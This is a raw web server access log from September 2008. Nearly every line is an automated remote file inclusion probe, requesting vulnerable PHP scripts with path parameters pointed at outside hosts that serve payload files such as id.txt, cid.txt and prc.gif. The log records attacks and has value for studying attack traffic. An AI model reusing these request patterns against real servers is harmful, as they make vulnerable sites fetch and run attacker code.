82.148.160.16 - - [12/Sep/2008:10:39:54 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.148.160.16 - - [12/Sep/2008:10:39:55 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.148.160.16 - - [12/Sep/2008:10:39:55 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.166.178 - - [12/Sep/2008:10:40:02 -0700] "GET /logs/access_080331.log//?_zb_path=http://geocities.com/xibitz/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.243.169.10 - - [12/Sep/2008:10:40:19 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.prodigyfish.com/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.243.169.10 - - [12/Sep/2008:10:40:20 -0700] "GET /logs/access_080219.log//modules/vwar/admin/admin.php?vwar_root=http://www.prodigyfish.com/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.243.169.10 - - [12/Sep/2008:10:40:20 -0700] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=http://www.prodigyfish.com/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.165.49.171 - - [12/Sep/2008:10:40:54 -0700] "GET /logs/access_080621.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://michelleshaprow.com/components/com_extcalendar/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.226.77.5 - - [12/Sep/2008:10:40:57 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.prosubi.com.au//images/.bash/id7by.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:40:57 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:40:58 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:41:00 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
87.226.77.5 - - [12/Sep/2008:10:41:01 -0700] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.prosubi.com.au//images/.bash/id7by.txt? HTTP/1.1" 200 89449 "-" "libwww-perl/5.812" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:41:01 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
82.138.35.12 - - [12/Sep/2008:10:41:03 -0700] "GET /logs/access_071214.log/?_zb_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.138.35.12 - - [12/Sep/2008:10:41:05 -0700] "GET /?_zb_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 200 89034 "-" "libwww-perl/5.811" "www.dmulk.com"
82.138.35.12 - - [12/Sep/2008:10:41:06 -0700] "GET /logs/?_zb_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 200 64716 "-" "libwww-perl/5.811" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:41:12 -0700] "GET /logs/access_080522.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:41:15 -0700] "GET /logs/access_080522.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:41:15 -0700] "GET /logs/access_080522.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:41:15 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:41:15 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:41:16 -0700] "GET /logs/access_080522.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:41:16 -0700] "GET /logs/access_080522.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:41:17 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:41:17 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:41:17 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:41:18 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.148.160.16 - - [12/Sep/2008:10:41:20 -0700] "GET /logs/access_071214.log/?_zb_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:41:21 -0700] "GET /logs/access_080522.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.148.160.16 - - [12/Sep/2008:10:41:21 -0700] "GET /?_zb_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 200 89034 "-" "libwww-perl/5.805" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:41:21 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.85.63.226 - - [12/Sep/2008:10:41:21 -0700] "GET /logs/access_080828.log//phpraider//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://ideaindustry.us/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:41:22 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.85.63.226 - - [12/Sep/2008:10:41:22 -0700] "GET //phpraider//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://ideaindustry.us/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.148.160.16 - - [12/Sep/2008:10:41:22 -0700] "GET /logs/?_zb_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 200 64716 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [12/Sep/2008:10:41:23 -0700] "GET /logs//phpraider//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://ideaindustry.us/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.75.204.249 - - [12/Sep/2008:10:41:34 -0700] "GET /errors.php?error=http://tanahdijual.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
62.75.204.249 - - [12/Sep/2008:10:41:34 -0700] "GET /logs/access_080223.log/errors.php?error=http://tanahdijual.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
62.75.204.249 - - [12/Sep/2008:10:41:34 -0700] "GET /logs/errors.php?error=http://tanahdijual.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
87.226.77.5 - - [12/Sep/2008:10:41:41 -0700] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.prosubi.com.au//images/.bash/id7by.txt? HTTP/1.1" 200 89449 "-" "libwww-perl/5.812" "www.dmulk.com"
62.75.204.249 - - [12/Sep/2008:10:41:46 -0700] "GET /logs/access_080809.log/errors.php?error=http://tanahdijual.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:41:50 -0700] "GET /logs/access_080226.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:41:50 -0700] "GET /logs/access_080226.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:41:53 -0700] "GET /logs/access_080226.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:41:56 -0700] "GET /logs/access_080226.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.172.9.3 - - [12/Sep/2008:10:41:56 -0700] "GET /logs//ashnews.php?pathtoashnews=http://vnc2008.webcindario.com/id44.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.172.9.3 - - [12/Sep/2008:10:41:56 -0700] "GET //ashnews.php?pathtoashnews=http://vnc2008.webcindario.com/id44.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.141.56.36 - - [12/Sep/2008:10:42:18 -0700] "GET /logs/access_080820.log/phphtml.php?htmlclass_path=http://www.giannuzzu.altervista.org/images/zoom/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.12.123.6 - - [12/Sep/2008:10:42:21 -0700] "GET /logs/access_080304.log//?path%5Bdocroot%5D=http://www.prodigyfish.com/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.12.123.6 - - [12/Sep/2008:10:42:22 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.prodigyfish.com/copyright.txt?? HTTP/1.1" 200 64721 "-" "Mozilla/5.0" "www.dmulk.com"
87.117.219.154 - - [12/Sep/2008:10:42:22 -0700] "GET /logs/access_080319.log/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.hbinfo.org/amember/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.117.219.154 - - [12/Sep/2008:10:42:22 -0700] "GET /logs/access_080702.log/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.hbinfo.org/amember/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.117.219.154 - - [12/Sep/2008:10:42:22 -0700] "GET /includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.hbinfo.org/amember/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.117.219.154 - - [12/Sep/2008:10:42:22 -0700] "GET /logs/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.hbinfo.org/amember/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:10:42:24 -0700] "GET /logs/access_080817.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:10:42:26 -0700] "GET /logs/access_080817.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.13.231.126 - - [12/Sep/2008:10:42:32 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.gter.biz/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
64.13.231.126 - - [12/Sep/2008:10:42:32 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.gter.biz/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
222.231.24.38 - - [12/Sep/2008:10:42:49 -0700] "GET /logs/access_080418.log/index.php?option=com_expose&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
12.192.82.221 - - [12/Sep/2008:10:43:00 -0700] "GET /logs/access_080224.log/popup.php?path=http://www.satinvestigacion.net/foro5/includes/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
12.192.82.221 - - [12/Sep/2008:10:43:00 -0700] "GET /popup.php?path=http://www.satinvestigacion.net/foro5/includes/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
12.192.82.221 - - [12/Sep/2008:10:43:00 -0700] "GET /logs/popup.php?path=http://www.satinvestigacion.net/foro5/includes/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.34.17.159 - - [12/Sep/2008:10:43:05 -0700] "GET /include/bbs.lib.inc.php?site_path=http://ownedyoubox.t35.com/idr0x.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.34.17.159 - - [12/Sep/2008:10:43:05 -0700] "GET /logs/include/bbs.lib.inc.php?site_path=http://ownedyoubox.t35.com/idr0x.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.34.17.159 - - [12/Sep/2008:10:43:05 -0700] "GET /logs/access_080518.log/include/bbs.lib.inc.php?site_path=http://ownedyoubox.t35.com/idr0x.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.34.17.159 - - [12/Sep/2008:10:43:05 -0700] "GET /logs/access_080628.log/include/bbs.lib.inc.php?site_path=http://ownedyoubox.t35.com/idr0x.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
125.243.76.61 - - [12/Sep/2008:10:43:10 -0700] "GET /logs/access_080331.log/?_zb_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.111.173.68 - - [12/Sep/2008:10:43:11 -0700] "GET /logs/access_080306.log/index.php?site=http://www.global-wills.com/membership/data/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.68 - - [12/Sep/2008:10:43:11 -0700] "GET /logs/access_080306.log/index.php?site=http://www.global-wills.com/membership/data/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.68 - - [12/Sep/2008:10:43:12 -0700] "GET /index.php?site=http://www.global-wills.com/membership/data/readme.txt?? HTTP/1.1" 200 89204 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.68 - - [12/Sep/2008:10:43:12 -0700] "GET /index.php?site=http://www.global-wills.com/membership/data/readme.txt?? HTTP/1.1" 200 89204 "-" "libwww-perl/5.805" "www.dmulk.com"
207.249.0.39 - - [12/Sep/2008:10:43:13 -0700] "GET /logs/access_080412.log/?sourcedir=http://www.satinvestigacion.net/foro5/includes/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.249.0.39 - - [12/Sep/2008:10:43:13 -0700] "GET /?sourcedir=http://www.satinvestigacion.net/foro5/includes/TT?? HTTP/1.1" 200 89159 "-" "libwww-perl/5.805" "www.dmulk.com"
207.249.0.39 - - [12/Sep/2008:10:43:14 -0700] "GET /logs/?sourcedir=http://www.satinvestigacion.net/foro5/includes/TT?? HTTP/1.1" 200 64716 "-" "libwww-perl/5.805" "www.dmulk.com"
62.141.56.36 - - [12/Sep/2008:10:43:14 -0700] "GET /logs/access_080816.log/phphtml.php?htmlclass_path=http://www.giannuzzu.altervista.org/images/zoom/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.111.173.68 - - [12/Sep/2008:10:43:15 -0700] "GET /logs/index.php?site=http://www.global-wills.com/membership/data/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.68 - - [12/Sep/2008:10:43:16 -0700] "GET /logs/index.php?site=http://www.global-wills.com/membership/data/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
129.142.67.13 - - [12/Sep/2008:10:43:19 -0700] "GET /logs/access_080523.log/index.php?option=com_forum&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.249.23.190 - - [12/Sep/2008:10:43:25 -0700] "GET /logs/access_080826.log%20%20//?pg=http://egetyn-adag.eravna.ru//wp-content/fgallery_images/image.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:43:26 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:43:26 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.249.0.39 - - [12/Sep/2008:10:43:28 -0700] "GET /logs/access_080313.log/?sourcedir=http://www.satinvestigacion.net/foro5/includes/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.203.121.1 - - [12/Sep/2008:10:43:52 -0700] "GET /logs/access_080813.log%20/ashnews.php?pathtoashnews=http://ownedyoubox.t35.com/idr0x.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.141.56.36 - - [12/Sep/2008:10:43:52 -0700] "GET /logs/access_080723.log/errors.php?error=http://www.giannuzzu.altervista.org/images/zoom/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.72.112.158 - - [12/Sep/2008:10:43:52 -0700] "GET /logs/access_080518.log/include/bbs.lib.inc.php?site_path=http://ownedyoubox.t35.com/idr0x.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
64.72.112.158 - - [12/Sep/2008:10:43:52 -0700] "GET /logs/include/bbs.lib.inc.php?site_path=http://ownedyoubox.t35.com/idr0x.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
64.72.112.158 - - [12/Sep/2008:10:43:52 -0700] "GET /include/bbs.lib.inc.php?site_path=http://ownedyoubox.t35.com/idr0x.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
64.72.112.158 - - [12/Sep/2008:10:43:52 -0700] "GET /logs/access_080628.log/include/bbs.lib.inc.php?site_path=http://ownedyoubox.t35.com/idr0x.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
62.141.56.36 - - [12/Sep/2008:10:43:53 -0700] "GET /errors.php?error=http://www.giannuzzu.altervista.org/images/zoom/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.36 - - [12/Sep/2008:10:43:53 -0700] "GET /logs/errors.php?error=http://www.giannuzzu.altervista.org/images/zoom/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
194.165.49.171 - - [12/Sep/2008:10:44:12 -0700] "GET /logs/access_080524.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://michelleshaprow.com/components/com_extcalendar/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.9.3.36 - - [12/Sep/2008:10:44:15 -0700] "GET /logs/errors.php?error=http://www.prosubi.com.au//images/.bash/id7by.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.9.3.36 - - [12/Sep/2008:10:44:16 -0700] "GET /errors.php?error=http://www.prosubi.com.au//images/.bash/id7by.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.22.37.144 - - [12/Sep/2008:10:44:18 -0700] "GET /logs/access_080331.log///?_zb_path=http://www.jisu.ms.kr/data/info??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.111.176.9 - - [12/Sep/2008:10:44:25 -0700] "GET /logs/access_080623.log/index.php?x=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.59.71.79 - - [12/Sep/2008:10:44:28 -0700] "GET /logs/access_080829.log/e404.php?DOCUMENT_ROOT=http://www.wandptraining.co.uk/includes/styles/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.79 - - [12/Sep/2008:10:44:28 -0700] "GET /e404.php?DOCUMENT_ROOT=http://www.wandptraining.co.uk/includes/styles/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.79 - - [12/Sep/2008:10:44:28 -0700] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.wandptraining.co.uk/includes/styles/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.218.85.18 - - [12/Sep/2008:10:44:29 -0700] "GET //admin.php?include_path=http://h1.ripway.com/copilot/files/gambar.dat? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.243.169.10 - - [12/Sep/2008:10:44:29 -0700] "GET /logs/access_080127.log%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.prodigyfish.com/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.243.169.10 - - [12/Sep/2008:10:44:32 -0700] "GET /logs/access_071230.log%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.prodigyfish.com/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.173.68 - - [12/Sep/2008:10:44:34 -0700] "GET /logs/access_080316.log/index.php?site=http://www.global-wills.com/membership/data/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.68 - - [12/Sep/2008:10:44:35 -0700] "GET /logs/access_080316.log/index.php?site=http://www.global-wills.com/membership/data/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.141.56.36 - - [12/Sep/2008:10:44:38 -0700] "GET /errors.php?error=http://www.giannuzzu.altervista.org/images/zoom/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.36 - - [12/Sep/2008:10:44:39 -0700] "GET /logs/access_080830.log/errors.php?error=http://www.giannuzzu.altervista.org/images/zoom/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.36 - - [12/Sep/2008:10:44:40 -0700] "GET /logs/access_080723.log//index.php?DOCUMENT_ROOT=http://www.giannuzzu.altervista.org/images/zoom/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.79 - - [12/Sep/2008:10:44:40 -0700] "GET /logs/access_080823.log/e404.php?DOCUMENT_ROOT=http://www.wandptraining.co.uk/includes/styles/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.36 - - [12/Sep/2008:10:44:41 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.giannuzzu.altervista.org/images/zoom/id.txt??? HTTP/1.1" 200 89269 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:44:43 -0700] "GET /logs/access_080522.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.36 - - [12/Sep/2008:10:44:45 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.giannuzzu.altervista.org/images/zoom/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.12.123.6 - - [12/Sep/2008:10:44:45 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.prodigyfish.com/copyright.txt?? HTTP/1.1" 200 64721 "-" "Mozilla/5.0" "www.dmulk.com"
122.49.120.85 - - [12/Sep/2008:10:44:48 -0700] "GET /logs/access_080412.log/?sourcedir=http://www.satinvestigacion.net/foro5/includes/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:44:49 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:44:49 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.22.178 - - [12/Sep/2008:10:44:49 -0700] "GET /presto/?M=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
122.49.120.85 - - [12/Sep/2008:10:44:49 -0700] "GET /?sourcedir=http://www.satinvestigacion.net/foro5/includes/TT?? HTTP/1.1" 200 89159 "-" "libwww-perl/5.79" "www.dmulk.com"
122.49.120.85 - - [12/Sep/2008:10:44:51 -0700] "GET /logs/?sourcedir=http://www.satinvestigacion.net/foro5/includes/TT?? HTTP/1.1" 200 64716 "-" "libwww-perl/5.79" "www.dmulk.com"
212.12.123.6 - - [12/Sep/2008:10:44:52 -0700] "GET /logs/access_080304.log//?path%5Bdocroot%5D=http://www.prodigyfish.com/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
